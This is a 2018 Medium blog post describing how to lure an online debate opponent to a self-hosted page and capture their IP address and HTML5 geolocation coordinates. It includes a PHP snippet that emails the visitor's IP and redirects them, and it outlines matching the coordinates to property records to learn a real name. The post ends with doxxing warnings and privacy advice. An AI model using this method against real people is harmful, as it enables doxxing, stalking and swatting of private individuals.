Geolocation `Attack`: Entrapping your anonymous opponent online

How to misuse the Geolocation API to strip your online opponent’s anonymity. And, how to save yourself from it.

Ax Sharma
Ax Sharma
Nov 24, 2018 · 4 min read
Image for post
Image for post
Google Chrome: Consent Popup frequently seen for websites requesting your real location

Someone giving you a hard time during a discussion online? What if you could find out that commenter is, or who they are?

But also, look at this the other way — what if they could trick you into revealing your real location and name?

That is one of the ways the HTML5 frequently used by most websites today to ‘know your location’ can be misused.

If you are not familiar with Geolocation, head right over to W3Schools.

But anyway, the actual “attack” is pretty straightforward and requires a of social engineering. When finding yourself caught up in a heated debate about hot button issues — whether on Reddit, Medium or anywhere, you would want to say something like “Look here http://your-website.tld/some/page. The statistics don’t lie. You’ll see my point… ”.

Image for post
Image for post
Credit: https://medium.com/@benjaminsledge/honest-thoughts-from-a-veteran-about-gun-control-and-mental-health-c74930488e28

FYI, the get_geolocation link above is fictitious — I’m trying to show you I could create one on my website and have you redirect to the actual page that proves some of my claims.

High chances, if you are debating with someone who is seriously intellectual and not just , they’ll click on the link out of curiosity.

This is where the magic happens.

The link should lead them to a page controlled by you. At the very least, a one-line serverside code will reveal their IP address:

<?php
//email me their IP
mail("me@my.email", "Opponent's IP", "IP is: ".$_SERVER['REMOTE_ADDR'])); //Redirect them to the actual page
header("Location: http://redirect/to/the/actual/page");
?>

To make it look more legitimate, you can redirect the user to the actual URL which loads the resource that your argument. If you don’t do this, a blank page will either raise suspicion or enrage the “opponent”. They’ll likely call you an “idiot” for posting a dead link.

There are other ways to retrieve the IP address of a visitor too. Note, that this applies to who clicks your link not just visitor, so don’t be so confident that the IP you get is user’s alone — unless you were going back and forth with only one person in a heated debate.

You can then use an IP tracer or a simple API to reveal in what City and Country is the IP and hence the user, likely based — this won’t work well if the user is on an anonymous VPN, for obvious reasons.

So, why not also inject client-side JavaScript code on the page which asks the user for their location? HTML5 Geolocation API, other than relying on the IP address alone, leverages a couple of data points (such as Wi-Fi SSIDs, GPS, etc.) which can accurately identify the user’s location.

Image for post
Image for post
Credit: https://www.w3schools.com/html/html5_geolocation.asp

If they are careless, they may just click ‘Allow’ not giving it a second thought, to dismiss the popup. Then after a few seconds, once you retrieve the coordinates, you could have your page send it to your server using a sleek AJAX request, and thenhave your page redirect the user to the actual resource related to your argument. Simple enough and gets you the exact coordinates of the user.

If they live in a big enough house, you’ll likely know exactly where they are. Take it a step further and the public records, property / deeds county records will even reveal their real name!

Beware though, the same social engineering tactic can very well be used youno one likes to be doxxed or SWATted so read this piece as a mere weekend entertainment and to yourself, instead of getting adventurous.

Next time you see a website requesting your consent for your location, unless it has a good enough reason to, best to click “Deny”.

Image for post
Image for post
Credit: Google Maps

Disclaimer: This article is meant for educational and entertainment purposes only. My intention is for you to safeguard yourself and think twice before revealing your location to apps and any website requesting it. Do not violate any laws in your area and respect the privacy of others, much as you’d prefer yours to be respected. I will not be responsible if you get yourself in trouble, break any laws or infringe on the privacy of another person.

© 2018. Akshay ‘Ax’ Sharma. All Rights Reserved.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store